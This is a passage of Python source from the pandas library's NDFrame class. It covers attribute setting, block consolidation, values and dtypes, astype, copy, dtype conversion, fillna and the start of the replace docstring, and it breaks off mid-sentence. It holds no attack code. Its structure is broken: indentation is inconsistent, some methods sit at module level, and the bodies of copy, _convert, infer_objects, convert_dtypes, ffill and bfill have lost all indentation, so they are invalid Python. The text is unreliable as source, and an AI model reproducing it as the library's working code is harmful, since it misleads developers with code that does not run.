            existing = getattr(self, name)
            if isinstance(existing, Index):
                # Axis attributes (index/columns) go through normal setattr.
                object.__setattr__(self, name, value)
            elif name in self._info_axis:
                # Name matches an existing label (e.g. a column): treat the
                # assignment as item setting, not attribute setting.
                self[name] = value
            else:
                object.__setattr__(self, name, value)
        except (AttributeError, TypeError):
            # Assigning a list-like to a fresh attribute on a DataFrame is
            # almost always a mistaken attempt to create a column; warn but
            # still perform the attribute assignment.
            if isinstance(self, ABCDataFrame) and (is_list_like(value)):
                warnings.warn(
                    "Pandas doesn't allow columns to be "
                    "created via a new attribute name - see "
                    "https://pandas.pydata.org/pandas-docs/"
                    "stable/indexing.html#attribute-access",
                    stacklevel=2,
                )
            object.__setattr__(self, name, value)
def _dir_additions(self):
    """
    Add the string-like attributes from the info_axis.

    If info_axis is a MultiIndex, its first level values are used.
    """
    # Cap at the first 100 unique labels to keep tab-completion responsive.
    candidate_labels = self._info_axis.unique(level=0)[:100]
    extras = set()
    for label in candidate_labels:
        # Only valid Python identifiers can be offered as attributes.
        if isinstance(label, str) and label.isidentifier():
            extras.add(label)
    return super()._dir_additions().union(extras)
# ----------------------------------------------------------------------
# Consolidation of internals
def _protect_consolidate(self, f):
    """
    Run ``f`` and clear the item cache if consolidation changed the blocks.
    """
    n_blocks_before = len(self._data.blocks)
    result = f()
    # A different block count means the manager was restructured, so any
    # cached items may be stale.
    if len(self._data.blocks) != n_blocks_before:
        self._clear_item_cache()
    return result
def _consolidate_inplace(self) -> None:
    """Consolidate data in place and return None"""

    def _do_consolidate():
        # Rebind the block manager to its consolidated form.
        self._data = self._data.consolidate()

    self._protect_consolidate(_do_consolidate)
def _consolidate(self, inplace: bool_t = False):
    """
    Compute NDFrame with "consolidated" internals (data of each dtype
    grouped together in a single ndarray).

    Parameters
    ----------
    inplace : bool, default False
        If False return new object, otherwise modify existing object.

    Returns
    -------
    consolidated : same type as caller
    """
    inplace = validate_bool_kwarg(inplace, "inplace")
    if inplace:
        self._consolidate_inplace()
        return None
    # Consolidate through the protect wrapper so the item cache is cleared
    # if the block layout changes, then wrap the new manager.
    cons_data = self._protect_consolidate(self._data.consolidate)
    return self._constructor(cons_data).__finalize__(self)
@property
def _is_mixed_type(self) -> bool_t:
    # Queried through _protect_consolidate so a consolidation triggered by
    # the check also clears the item cache.
    return self._protect_consolidate(lambda: self._data.is_mixed_type)
@property
def _is_numeric_mixed_type(self) -> bool_t:
    # Same pattern as _is_mixed_type: delegate to the block manager under
    # the consolidation-protect wrapper.
    return self._protect_consolidate(lambda: self._data.is_numeric_mixed_type)
def _check_inplace_setting(self, value) -> bool_t:
    """ check whether we allow in-place setting with this type of value """
    # Homogeneous data is always fine to set in place.
    if not self._is_mixed_type:
        return True
    # Mixed-but-all-numeric data is also fine.
    if self._is_numeric_mixed_type:
        return True
    # allow an actual np.nan thru
    if is_float(value) and np.isnan(value):
        return True
    raise TypeError(
        "Cannot do inplace boolean setting on "
        "mixed-types with a non np.nan value"
    )
def _get_numeric_data(self):
    # Restrict the block manager to numeric blocks, re-wrap and propagate
    # metadata.
    numeric_mgr = self._data.get_numeric_data()
    return self._constructor(numeric_mgr).__finalize__(self)
def _get_bool_data(self):
    # Restrict the block manager to boolean blocks, re-wrap and propagate
    # metadata.
    bool_mgr = self._data.get_bool_data()
    return self._constructor(bool_mgr).__finalize__(self)
# ----------------------------------------------------------------------
# Internal Interface Methods
@property
def values(self) -> np.ndarray:
    """
    Return a Numpy representation of the DataFrame.

    .. warning::
       We recommend using :meth:`DataFrame.to_numpy` instead.

    Only the values in the DataFrame will be returned, the axes labels
    will be removed.

    Returns
    -------
    numpy.ndarray
        The values of the DataFrame.

    See Also
    --------
    DataFrame.to_numpy : Recommended alternative to this method.
    DataFrame.index : Retrieve the index labels.
    DataFrame.columns : Retrieving the column names.

    Notes
    -----
    The dtype will be a lower-common-denominator dtype (implicit
    upcasting); that is to say if the dtypes (even of numeric types)
    are mixed, the one that accommodates all will be chosen. Use this
    with care if you are not dealing with the blocks.
    e.g. If the dtypes are float16 and float32, dtype will be upcast to
    float32. If dtypes are int32 and uint8, dtype will be upcast to
    int32. By :func:`numpy.find_common_type` convention, mixing int64
    and uint64 will result in a float64 dtype.

    Examples
    --------
    A DataFrame where all columns are the same type (e.g., int64) results
    in an array of the same type.

    >>> df = pd.DataFrame({'age':    [ 3,  29],
    ...                    'height': [94, 170],
    ...                    'weight': [31, 115]})
    >>> df.dtypes
    age       int64
    height    int64
    weight    int64
    dtype: object
    >>> df.values
    array([[  3,  94,  31],
           [ 29, 170, 115]], dtype=int64)

    A DataFrame with mixed type columns(e.g., str/object, int64, float32)
    results in an ndarray of the broadest type that accommodates these
    mixed types (e.g., object).

    >>> df2 = pd.DataFrame([('parrot', 24.0, 'second'),
    ...                     ('lion',   80.5, 1),
    ...                     ('monkey', np.nan, None)],
    ...                    columns=('name', 'max_speed', 'rank'))
    >>> df2.dtypes
    name          object
    max_speed    float64
    rank          object
    dtype: object
    >>> df2.values
    array([['parrot', 24.0, 'second'],
           ['lion', 80.5, 1],
           ['monkey', nan, None]], dtype=object)
    """
    # Consolidate first so the block manager can build the array from as
    # few blocks as possible.
    self._consolidate_inplace()
    # as_array transposes when the internal block layout is reversed
    # relative to the public axes (per the _AXIS_REVERSED flag).
    return self._data.as_array(transpose=self._AXIS_REVERSED)
@property
def _values(self) -> np.ndarray:
    """internal implementation"""
    # Internal alias for the public ``values`` property.
    return self.values
def _internal_get_values(self) -> np.ndarray:
    """
    Return an ndarray after converting sparse values to dense.

    This is the same as ``.values`` for non-sparse data. For sparse
    data contained in a `SparseArray`, the data are first
    converted to a dense representation.

    Returns
    -------
    numpy.ndarray
        Numpy representation of DataFrame.

    See Also
    --------
    values : Numpy representation of DataFrame.
    SparseArray : Container for sparse data.
    """
    # Plain delegation to ``values`` at this level.
    return self.values
@property
def dtypes(self):
    """
    Return the dtypes in the DataFrame.

    This returns a Series with the data type of each column.
    The result's index is the original DataFrame's columns. Columns
    with mixed types are stored with the ``object`` dtype. See
    :ref:`the User Guide <basics.dtypes>` for more.

    Returns
    -------
    pandas.Series
        The data type of each column.

    Examples
    --------
    >>> df = pd.DataFrame({'float': [1.0],
    ...                    'int': [1],
    ...                    'datetime': [pd.Timestamp('20180310')],
    ...                    'string': ['foo']})
    >>> df.dtypes
    float              float64
    int                  int64
    datetime    datetime64[ns]
    string              object
    dtype: object
    """
    from pandas import Series

    # object dtype keeps the heterogeneous dtype objects intact in the
    # resulting Series.
    return Series(self._data.get_dtypes(), index=self._info_axis, dtype=np.object_)
def _to_dict_of_blocks(self, copy: bool_t = True):
    """
    Return a dict of dtype -> Constructor Types that
    each is a homogeneous dtype.

    Internal ONLY
    """
    result = {}
    # Re-wrap each homogeneous sub-manager as a full object of our type,
    # propagating metadata.
    for dtype_key, sub_mgr in self._data.to_dict(copy=copy).items():
        result[dtype_key] = self._constructor(sub_mgr).__finalize__(self)
    return result
    def astype(
        self: FrameOrSeries, dtype, copy: bool_t = True, errors: str = "raise"
    ) -> FrameOrSeries:
        """
        Cast a pandas object to a specified dtype ``dtype``.
        Parameters
        ----------
        dtype : data type, or dict of column name -> data type
            Use a numpy.dtype or Python type to cast entire pandas object to
            the same type. Alternatively, use {col: dtype, ...}, where col is a
            column label and dtype is a numpy.dtype or Python type to cast one
            or more of the DataFrame's columns to column-specific types.
        copy : bool, default True
            Return a copy when ``copy=True`` (be very careful setting
            ``copy=False`` as changes to values then may propagate to other
            pandas objects).
        errors : {'raise', 'ignore'}, default 'raise'
            Control raising of exceptions on invalid data for provided dtype.
            - ``raise`` : allow exceptions to be raised
            - ``ignore`` : suppress exceptions. On error return original object.
        Returns
        -------
        casted : same type as caller
        See Also
        --------
        to_datetime : Convert argument to datetime.
        to_timedelta : Convert argument to timedelta.
        to_numeric : Convert argument to a numeric type.
        numpy.ndarray.astype : Cast a numpy array to a specified type.
        Examples
        --------
        Create a DataFrame:
        >>> d = {'col1': [1, 2], 'col2': [3, 4]}
        >>> df = pd.DataFrame(data=d)
        >>> df.dtypes
        col1    int64
        col2    int64
        dtype: object
        Cast all columns to int32:
        >>> df.astype('int32').dtypes
        col1    int32
        col2    int32
        dtype: object
        Cast col1 to int32 using a dictionary:
        >>> df.astype({'col1': 'int32'}).dtypes
        col1    int32
        col2    int64
        dtype: object
        Create a series:
        >>> ser = pd.Series([1, 2], dtype='int32')
        >>> ser
        0    1
        1    2
        dtype: int32
        >>> ser.astype('int64')
        0    1
        1    2
        dtype: int64
        Convert to categorical type:
        >>> ser.astype('category')
        0    1
        1    2
        dtype: category
        Categories (2, int64): [1, 2]
        Convert to ordered categorical type with custom ordering:
        >>> cat_dtype = pd.api.types.CategoricalDtype(
        ...     categories=[2, 1], ordered=True)
        >>> ser.astype(cat_dtype)
        0    1
        1    2
        dtype: category
        Categories (2, int64): [2 < 1]
        Note that using ``copy=False`` and changing data on a new
        pandas object may propagate changes:
        >>> s1 = pd.Series([1, 2])
        >>> s2 = s1.astype('int64', copy=False)
        >>> s2[0] = 10
        >>> s1  # note that s1[0] has changed too
        0    10
        1     2
        dtype: int64
        """
        # Dict-like dtype: per-column (or Series-name) casts.
        if is_dict_like(dtype):
            if self.ndim == 1:  # i.e. Series
                # A Series mapping may only key on the Series' own name.
                if len(dtype) > 1 or self.name not in dtype:
                    raise KeyError(
                        "Only the Series name can be used for "
                        "the key in Series dtype mappings."
                    )
                new_type = dtype[self.name]
                return self.astype(new_type, copy, errors)
            # Validate every key up front so a bad key fails before any
            # column has been converted.
            for col_name in dtype.keys():
                if col_name not in self:
                    raise KeyError(
                        "Only a column name can be used for the "
                        "key in a dtype mappings argument."
                    )
            results = []
            for col_name, col in self.items():
                if col_name in dtype:
                    results.append(
                        col.astype(dtype=dtype[col_name], copy=copy, errors=errors)
                    )
                else:
                    # Columns not mentioned in the mapping keep their dtype.
                    results.append(col.copy() if copy else col)
        elif is_extension_array_dtype(dtype) and self.ndim > 1:
            # GH 18099/22869: columnwise conversion to extension dtype
            # GH 24704: use iloc to handle duplicate column names
            results = [
                self.iloc[:, i].astype(dtype, copy=copy)
                for i in range(len(self.columns))
            ]
        else:
            # else, only a single dtype is given
            new_data = self._data.astype(dtype=dtype, copy=copy, errors=errors)
            return self._constructor(new_data).__finalize__(self)
        # GH 19920: retain column metadata after concat
        result = pd.concat(results, axis=1, copy=False)
        result.columns = self.columns
        return result
def copy(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
"""
Make a copy of this object's indices and data.
When ``deep=True`` (default), a new object will be created with a
copy of the calling object's data and indices. Modifications to
the data or indices of the copy will not be reflected in the
original object (see notes below).
When ``deep=False``, a new object will be created without copying
the calling object's data or index (only references to the data
and index are copied). Any changes to the data of the original
will be reflected in the shallow copy (and vice versa).
Parameters
----------
deep : bool, default True
Make a deep copy, including a copy of the data and the indices.
With ``deep=False`` neither the indices nor the data are copied.
Returns
-------
copy : Series or DataFrame
Object type matches caller.
Notes
-----
When ``deep=True``, data is copied but actual Python objects
will not be copied recursively, only the reference to the object.
This is in contrast to `copy.deepcopy` in the Standard Library,
which recursively copies object data (see examples below).
While ``Index`` objects are copied when ``deep=True``, the underlying
numpy array is not copied for performance reasons. Since ``Index`` is
immutable, the underlying data can be safely shared and a copy
is not needed.
Examples
--------
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> s
a 1
b 2
dtype: int64
>>> s_copy = s.copy()
>>> s_copy
a 1
b 2
dtype: int64
**Shallow copy versus default (deep) copy:**
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> deep = s.copy()
>>> shallow = s.copy(deep=False)
Shallow copy shares data and index with original.
>>> s is shallow
False
>>> s.values is shallow.values and s.index is shallow.index
True
Deep copy has own copy of data and index.
>>> s is deep
False
>>> s.values is deep.values or s.index is deep.index
False
Updates to the data shared by shallow copy and original is reflected
in both; deep copy remains unchanged.
>>> s[0] = 3
>>> shallow[1] = 4
>>> s
a 3
b 4
dtype: int64
>>> shallow
a 3
b 4
dtype: int64
>>> deep
a 1
b 2
dtype: int64
Note that when copying an object containing Python objects, a deep copy
will copy the data, but will not do so recursively. Updating a nested
data object will be reflected in the deep copy.
>>> s = pd.Series([[1, 2], [3, 4]])
>>> deep = s.copy()
>>> s[0][0] = 10
>>> s
0 [10, 2]
1 [3, 4]
dtype: object
>>> deep
0 [10, 2]
1 [3, 4]
dtype: object
"""
data = self._data.copy(deep=deep)
return self._constructor(data).__finalize__(self)
def __copy__(self: FrameOrSeries, deep: bool_t = True) -> FrameOrSeries:
return self.copy(deep=deep)
def __deepcopy__(self: FrameOrSeries, memo=None) -> FrameOrSeries:
"""
Parameters
----------
memo, default None
Standard signature. Unused
"""
return self.copy(deep=True)
def _convert(
self: FrameOrSeries,
datetime: bool_t = False,
numeric: bool_t = False,
timedelta: bool_t = False,
coerce: bool_t = False,
copy: bool_t = True,
) -> FrameOrSeries:
"""
Attempt to infer better dtype for object columns
Parameters
----------
datetime : bool, default False
If True, convert to date where possible.
numeric : bool, default False
If True, attempt to convert to numbers (including strings), with
unconvertible values becoming NaN.
timedelta : bool, default False
If True, convert to timedelta where possible.
coerce : bool, default False
If True, force conversion with unconvertible values converted to
nulls (NaN or NaT).
copy : bool, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
Returns
-------
converted : same as input object
"""
validate_bool_kwarg(datetime, "datetime")
validate_bool_kwarg(numeric, "numeric")
validate_bool_kwarg(timedelta, "timedelta")
validate_bool_kwarg(coerce, "coerce")
validate_bool_kwarg(copy, "copy")
return self._constructor(
self._data.convert(
datetime=datetime,
numeric=numeric,
timedelta=timedelta,
coerce=coerce,
copy=copy,
)
).__finalize__(self)
def infer_objects(self: FrameOrSeries) -> FrameOrSeries:
"""
Attempt to infer better dtypes for object columns.
Attempts soft conversion of object-dtyped
columns, leaving non-object and unconvertible
columns unchanged. The inference rules are the
same as during normal Series/DataFrame construction.
.. versionadded:: 0.21.0
Returns
-------
converted : same type as input object
See Also
--------
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to numeric type.
convert_dtypes : Convert argument to best possible dtype.
Examples
--------
>>> df = pd.DataFrame({"A": ["a", 1, 2, 3]})
>>> df = df.iloc[1:]
>>> df
A
1 1
2 2
3 3
>>> df.dtypes
A object
dtype: object
>>> df.infer_objects().dtypes
A int64
dtype: object
"""
# numeric=False necessary to only soft convert;
# python objects will still be converted to
# native numpy numeric types
return self._constructor(
self._data.convert(
datetime=True, numeric=False, timedelta=True, coerce=False, copy=True
)
).__finalize__(self)
def convert_dtypes(
self: FrameOrSeries,
infer_objects: bool_t = True,
convert_string: bool_t = True,
convert_integer: bool_t = True,
convert_boolean: bool_t = True,
) -> FrameOrSeries:
"""
Convert columns to best possible dtypes using dtypes supporting ``pd.NA``.
.. versionadded:: 1.0.0
Parameters
----------
infer_objects : bool, default True
Whether object dtypes should be converted to the best possible types.
convert_string : bool, default True
Whether object dtypes should be converted to ``StringDtype()``.
convert_integer : bool, default True
Whether, if possible, conversion can be done to integer extension types.
convert_boolean : bool, defaults True
Whether object dtypes should be converted to ``BooleanDtypes()``.
Returns
-------
Series or DataFrame
Copy of input object with new dtype.
See Also
--------
infer_objects : Infer dtypes of objects.
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
to_numeric : Convert argument to a numeric type.
Notes
-----
By default, ``convert_dtypes`` will attempt to convert a Series (or each
Series in a DataFrame) to dtypes that support ``pd.NA``. By using the options
``convert_string``, ``convert_integer``, and ``convert_boolean``, it is
possible to turn off individual conversions to ``StringDtype``, the integer
extension types or ``BooleanDtype``, respectively.
For object-dtyped columns, if ``infer_objects`` is ``True``, use the inference
rules as during normal Series/DataFrame construction. Then, if possible,
convert to ``StringDtype``, ``BooleanDtype`` or an appropriate integer extension
type, otherwise leave as ``object``.
If the dtype is integer, convert to an appropriate integer extension type.
If the dtype is numeric, and consists of all integers, convert to an
appropriate integer extension type.
In the future, as new dtypes are added that support ``pd.NA``, the results
of this method will change to support those new dtypes.
Examples
--------
>>> df = pd.DataFrame(
... {
... "a": pd.Series([1, 2, 3], dtype=np.dtype("int32")),
... "b": pd.Series(["x", "y", "z"], dtype=np.dtype("O")),
... "c": pd.Series([True, False, np.nan], dtype=np.dtype("O")),
... "d": pd.Series(["h", "i", np.nan], dtype=np.dtype("O")),
... "e": pd.Series([10, np.nan, 20], dtype=np.dtype("float")),
... "f": pd.Series([np.nan, 100.5, 200], dtype=np.dtype("float")),
... }
... )
Start with a DataFrame with default dtypes.
>>> df
a b c d e f
0 1 x True h 10.0 NaN
1 2 y False i NaN 100.5
2 3 z NaN NaN 20.0 200.0
>>> df.dtypes
a int32
b object
c object
d object
e float64
f float64
dtype: object
Convert the DataFrame to use best possible dtypes.
>>> dfn = df.convert_dtypes()
>>> dfn
a b c d e f
0 1 x True h 10 NaN
1 2 y False i <NA> 100.5
2 3 z <NA> <NA> 20 200.0
>>> dfn.dtypes
a Int32
b string
c boolean
d string
e Int64
f float64
dtype: object
Start with a Series of strings and missing data represented by ``np.nan``.
>>> s = pd.Series(["a", "b", np.nan])
>>> s
0 a
1 b
2 NaN
dtype: object
Obtain a Series with dtype ``StringDtype``.
>>> s.convert_dtypes()
0 a
1 b
2 <NA>
dtype: string
"""
if self.ndim == 1:
return self._convert_dtypes(
infer_objects, convert_string, convert_integer, convert_boolean
)
else:
results = [
col._convert_dtypes(
infer_objects, convert_string, convert_integer, convert_boolean
)
for col_name, col in self.items()
]
result = pd.concat(results, axis=1, copy=False)
return result
# ----------------------------------------------------------------------
# Filling NA's
    @doc(**_shared_doc_kwargs)
    def fillna(
        self: FrameOrSeries,
        value=None,
        method=None,
        axis=None,
        inplace: bool_t = False,
        limit=None,
        downcast=None,
    ) -> Optional[FrameOrSeries]:
        """
        Fill NA/NaN values using the specified method.
        Parameters
        ----------
        value : scalar, dict, Series, or DataFrame
            Value to use to fill holes (e.g. 0), alternately a
            dict/Series/DataFrame of values specifying which value to use for
            each index (for a Series) or column (for a DataFrame).  Values not
            in the dict/Series/DataFrame will not be filled. This value cannot
            be a list.
        method : {{'backfill', 'bfill', 'pad', 'ffill', None}}, default None
            Method to use for filling holes in reindexed Series
            pad / ffill: propagate last valid observation forward to next valid
            backfill / bfill: use next valid observation to fill gap.
        axis : {axes_single_arg}
            Axis along which to fill missing values.
        inplace : bool, default False
            If True, fill in-place. Note: this will modify any
            other views on this object (e.g., a no-copy slice for a column in a
            DataFrame).
        limit : int, default None
            If method is specified, this is the maximum number of consecutive
            NaN values to forward/backward fill. In other words, if there is
            a gap with more than this number of consecutive NaNs, it will only
            be partially filled. If method is not specified, this is the
            maximum number of entries along the entire axis where NaNs will be
            filled. Must be greater than 0 if not None.
        downcast : dict, default is None
            A dict of item->dtype of what to downcast if possible,
            or the string 'infer' which will try to downcast to an appropriate
            equal type (e.g. float64 to int64 if possible).
        Returns
        -------
        {klass} or None
            Object with missing values filled or None if ``inplace=True``.
        See Also
        --------
        interpolate : Fill NaN values using interpolation.
        reindex : Conform object to new index.
        asfreq : Convert TimeSeries to specified frequency.
        Examples
        --------
        >>> df = pd.DataFrame([[np.nan, 2, np.nan, 0],
        ...                    [3, 4, np.nan, 1],
        ...                    [np.nan, np.nan, np.nan, 5],
        ...                    [np.nan, 3, np.nan, 4]],
        ...                   columns=list('ABCD'))
        >>> df
             A    B   C  D
        0  NaN  2.0 NaN  0
        1  3.0  4.0 NaN  1
        2  NaN  NaN NaN  5
        3  NaN  3.0 NaN  4
        Replace all NaN elements with 0s.
        >>> df.fillna(0)
            A   B   C   D
        0   0.0 2.0 0.0 0
        1   3.0 4.0 0.0 1
        2   0.0 0.0 0.0 5
        3   0.0 3.0 0.0 4
        We can also propagate non-null values forward or backward.
        >>> df.fillna(method='ffill')
            A   B   C   D
        0   NaN 2.0 NaN 0
        1   3.0 4.0 NaN 1
        2   3.0 4.0 NaN 5
        3   3.0 3.0 NaN 4
        Replace all NaN elements in column 'A', 'B', 'C', and 'D', with 0, 1,
        2, and 3 respectively.
        >>> values = {{'A': 0, 'B': 1, 'C': 2, 'D': 3}}
        >>> df.fillna(value=values)
            A   B   C   D
        0   0.0 2.0 2.0 0
        1   3.0 4.0 2.0 1
        2   0.0 1.0 2.0 5
        3   0.0 3.0 2.0 4
        Only replace the first NaN element.
        >>> df.fillna(value=values, limit=1)
            A   B   C   D
        0   0.0 2.0 2.0 0
        1   3.0 4.0 NaN 1
        2   NaN 1.0 NaN 5
        3   NaN 3.0 NaN 4
        """
        inplace = validate_bool_kwarg(inplace, "inplace")
        value, method = validate_fillna_kwargs(value, method)
        self._consolidate_inplace()
        # set the default here, so functions examining the signature
        # can detect if something was set (e.g. in groupby) (GH9221)
        if axis is None:
            axis = 0
        axis = self._get_axis_number(axis)
        if value is None:
            # No fill value: propagate observations via pad/backfill
            # (the block manager implements this through ``interpolate``).
            if self._is_mixed_type and axis == 1:
                if inplace:
                    raise NotImplementedError()
                # Mixed-type frames cannot pad along columns directly;
                # transpose, fill along rows, transpose back.
                result = self.T.fillna(method=method, limit=limit).T
                # need to downcast here because of all of the transposes
                result._data = result._data.downcast()
                return result
            new_data = self._data.interpolate(
                method=method,
                axis=axis,
                limit=limit,
                inplace=inplace,
                coerce=True,
                downcast=downcast,
            )
        else:
            # Empty axis: nothing to fill.
            if len(self._get_axis(axis)) == 0:
                return self
            if self.ndim == 1:
                if isinstance(value, (dict, ABCSeries)):
                    value = create_series_with_explicit_dtype(
                        value, dtype_if_empty=object
                    )
                elif not is_list_like(value):
                    pass
                else:
                    raise TypeError(
                        '"value" parameter must be a scalar, dict '
                        "or Series, but you passed a "
                        f'"{type(value).__name__}"'
                    )
                new_data = self._data.fillna(
                    value=value, limit=limit, inplace=inplace, downcast=downcast
                )
            elif isinstance(value, (dict, ABCSeries)):
                # Per-column fill values: fill column by column.
                if axis == 1:
                    raise NotImplementedError(
                        "Currently only can fill "
                        "with dict/Series column "
                        "by column"
                    )
                result = self if inplace else self.copy()
                for k, v in value.items():
                    if k not in result:
                        continue
                    obj = result[k]
                    obj.fillna(v, limit=limit, inplace=True, downcast=downcast)
                return result if not inplace else None
            elif not is_list_like(value):
                new_data = self._data.fillna(
                    value=value, limit=limit, inplace=inplace, downcast=downcast
                )
            elif isinstance(value, ABCDataFrame) and self.ndim == 2:
                # DataFrame of fill values: keep non-NA entries, take the
                # corresponding entry from ``value`` where this frame is NA.
                new_data = self.where(self.notna(), value)
            else:
                raise ValueError(f"invalid fill value with a {type(value)}")
        if inplace:
            self._update_inplace(new_data)
            return None
        else:
            return self._constructor(new_data).__finalize__(self)
def ffill(
self: FrameOrSeries,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Synonym for :meth:`DataFrame.fillna` with ``method='ffill'``.
Returns
-------
%(klass)s or None
Object with missing values filled or None if ``inplace=True``.
"""
return self.fillna(
method="ffill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
)
def bfill(
self: FrameOrSeries,
axis=None,
inplace: bool_t = False,
limit=None,
downcast=None,
) -> Optional[FrameOrSeries]:
"""
Synonym for :meth:`DataFrame.fillna` with ``method='bfill'``.
Returns
-------
%(klass)s or None
Object with missing values filled or None if ``inplace=True``.
"""
return self.fillna(
method="bfill", axis=axis, inplace=inplace, limit=limit, downcast=downcast
)
_shared_docs[
"replace"
] = """
Replace values given in `to_replace` with `value`.
Values of the %(klass)s are replaced with other values dynamically.
This differs from updating with ``.loc`` or ``.iloc``, which require
you to specify a location to update with some value.
Parameters
----------
to_replace : str, regex, list, dict, Series, int, float, or None
How to find the values that will be replaced.
* numeric, str or regex:
- numeric: numeric values equal to `to_replace` will be
replaced with `value`
- str: string exactly matching `to_replace` will be replaced
with `value`
- regex: regexs matching `to_replace` will be replaced with
`value`
* list of str, regex, or numeric:
- First, if `to_replace` and `value` are both lists, they
**must** be the same length.
- Second, if ``regex=True`` then all of the strings in **both**
lists will be interpreted as regexs otherwise they will match
directly. This doesn't matter much for `value` since there
are only a few possible substitution regexes you can use.
- str, regex and numeric rules apply as above.
* dict:
- Dicts can be used to specify different replacement values
for different existing values. For example,
``{'a': 'b', 'y': 'z'}`` replaces the value 'a' with 'b' and
'y' with 'z'. To use a dict in this way the `value`
parameter should be `None`.
- For a DataFrame a dict can specify that different values
should be replaced in different columns. For example,
``{'a': 1, 'b': 'z'}`` looks for the value 1 in column 'a'
and the value 'z' in column 'b' and replaces these values
with whatever is specified in `value`. The `value` parameter
should not be ``None`` in this case. You can treat this as a
special case of passing two lists except that you are
specifying the column to search in.
- For a DataFrame nested dictionaries, e.g.,
``{'a': {'b': np.nan}}``, are read as follows: look in column
'a' for the value 'b' and replace it with NaN. The `value`
parameter should be ``None`` to use a nested dict in this
way. You can nest regular expressions as well. Note that
column names (the top-level dictionary keys in a nested
dictionary) **cannot** be regular expressions.
* None:
- This means that the `regex` argument must be a string,
compiled regular expression, or list, dict, ndarray or
Series of such elements. If `value` is also ``None`` then
this **must** be a nested dictionary or Series.
See the examples section for examples of each of these.
value : scalar, dict, list, str, regex, default None
Value to replace any values matching `to_replace` with.
For a DataFrame a dict of values can be used to specify which
value to use for each column (columns not in the dict will not be
filled). Regular expressions, strings and lists or dicts of such
objects are also allowed.
inplace : bool, default False
If True, in place. Note: this will modify any
other views on this object (e.g. a column from a DataFrame).
Returns the caller if this is True.
limit : int, default None
Maximum size gap to forward or backward fill.
regex : bool or same types as `to_replace`, default False
Whether to interpret `to_replace` and/or `value` as regular
expressions. If this is ``True`` then `to_replace` *must* be a
string. Alternatively, this could be a regular expression or a
list, dict, or array of regular expressions in which case
`to_replace` must be ``None``.
method : {'pad', 'ffill', 'bfill', `None`}
The method to use when for replacement, when `to_replace` is a
scalar, list or tuple and `value` is ``None``.
.. versionchanged:: 0.23.0
Added to DataFrame.
Returns
-------
%(klass)s
Object after replacement.
Raises
------
AssertionError
* If `regex` is not a ``bool`` and `to_replace` is not
``None``.
TypeError
* If `to_replace` is not a scalar, array-like, ``dict``, or ``None``
* If `to_replace` is a ``dict`` and `value` is not a ``list``,
``dict``, ``ndarray``, or ``Series``
* If `to_replace` is ``None`` and `regex` is not compilable
into a regular expression or is a list, dict, ndarray, or
Series.
* When replacing multiple ``bool`` or ``datetime64`` objects and
the arguments to `to_replace` does not match the type of the
value being replaced
ValueError
* If a ``list`` or an ``ndarray`` is passed to `to_replace` and
`value` but they are not the same length.
See Also
--------
%(klass)s.fillna : Fill NA values.
%(klass)s.where : Replace values based on boolean condition.
Series.str.replace : Simple string replacement.
Notes
-----
* Regex substitution is performed under the hood with ``re.sub``. The
rules for substitution for ``re.sub`` are the same.
* Regular expressions will only substitute on strings, meaning you
cannot provide, for example, a regular expression matching floating
point numbers and expect the columns in your frame that have a
numeric dtype to be matched. However, if those floating point
numbers *are* strings, then you can do this.
* This method has *a lot* of options. You are encouraged to experiment
and play with this method to gain intuition about how it works.
* When dict is used as the `to_replace` value, it is like
key(s) in the dict are the to_replace part and
value(s) in the dict are the value parameter.
Examples
--------
**Scalar `to_replace` and `value`**
>>> s = pd.Series([0, 1, 2, 3, 4])
>>> s.replace(0, 5)
0 5
1 1
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
... 'B': [5, 6, 7, 8, 9],
... 'C': ['a', 'b', 'c', 'd', 'e']})
>>> df.replace(0, 5)
A B C
0 5 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
**List-like `to_replace`**
>>> df.replace([0, 1, 2, 3], 4)
A B C
0 4 5 a
1 4 6 b
2 4 7 c
3 4 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], [4, 3, 2, 1])
A B C
0 4 5 a
1 3 6 b
2 2 7 c
3 1 8 d
4 4 9 e
>>> s.replace([1, 2], method='bfill')
0 0
1 3
2 3
3 3
4 4
dtype: int64
**dict-like `to_replace`**
>>> df.replace({0: 10, 1: 100})
A B C
0 10 5 a
1 100 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': 0, 'B': 5}, 100)
A B C
0 100 100 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': {0: 100, 4: 400}})
A B C
0 100 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 400 9 e
**Regular expression `to_replace`**
>>> df = pd.DataFrame({'A': ['bat', 'foo', 'bait'],
... 'B': ['abc', 'bar', 'xyz']})
>>> df.replace(to_replace=r'^ba.$', value='new', regex=True)
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace({'A': r'^ba.$'}, {'A': 'new'}, regex=True)
A B
0 new abc
1 foo bar
2 bait xyz
>>> df.replace(regex=r'^ba.$', value='new')
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})
A B
0 new abc
1 xyz new
2 bait xyz
>>> df.replace(regex=[r'^ba.$', 'foo'], value='new')
A B
0 new abc
1 new new
2 bait xyz
Note that when replacing multiple ``bool`` or ``datetime64`` objects,
the data types in the `to_replace` parameter must match the data
type of the value being replaced:
>>> df = pd.DataFrame({'A': [True, False, True],
... 'B': [False, True, False]})
>>> df.replace({'a string': 'new value', True: False}) # raises
Traceback (most recent call last):
...
TypeError: Cannot compare types 'ndarray(dtype=bool)' and 'str'
This raises a ``TypeError`` because one of the ``dict`` keys is not of
the correct type for replacement.
Compare the behavior of ``s.replace({'a': None})`` and
``s.replace('a', None)`` to understand the peculiarities
of the `to_replace` parameter:
>>> s = pd.Series([10, 'a', 'a', 'b', 'a'])
When one uses a dict as the `to_replace` value, it is like the
